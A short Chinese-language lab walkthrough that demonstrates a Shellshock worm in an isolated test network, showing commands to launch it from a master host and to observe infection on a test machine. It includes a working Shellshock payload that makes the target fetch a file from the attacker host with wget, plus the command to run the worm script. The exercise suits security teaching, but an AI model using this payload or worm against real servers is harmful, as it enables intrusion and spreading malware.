使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。
[root@worm-master ~]# tail /var/log/httpd/access_log
[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi
[root@worm-master ~]# tail /var/log/httpd/access_log
?
1.为了避免自身被感染,向蠕虫表明自己是发起者的身份,我们需要登录10.1.1.231主机,通过下面的命令创建一个文件。
[root@worm-master ~]# touch /tmp/key.txt
2.继续在10.1.1.231上执行下面的命令,可以找到蠕虫程序。
[root@worm-master shockworm]# cd /root/shockworm/
[root@worm-master shockworm]# ls
Shellshock.pl
?
3.登录worm1,查看/tmp目录。
[root@worm-test1 tmp]# ls -al
4.继续返回10.1.1.231主机,执行下面的命令,来运行蠕虫程序。
[root@worm-master shockworm]# perl shellshock.pl
5.登录Worm1,执行下面的命令,观察被感染的特征。
[root@worm-test1 tmp]# ls -al
[root@worm-test1 tmp]# ls .ssh-mOTc45gfXwPj/
[root@worm-test1 tmp]# ps aux | grep agent.1337
通过对比/tmp目录可以发现,Worm1已经被感染了shockworm蠕虫程序,如下图。
?
?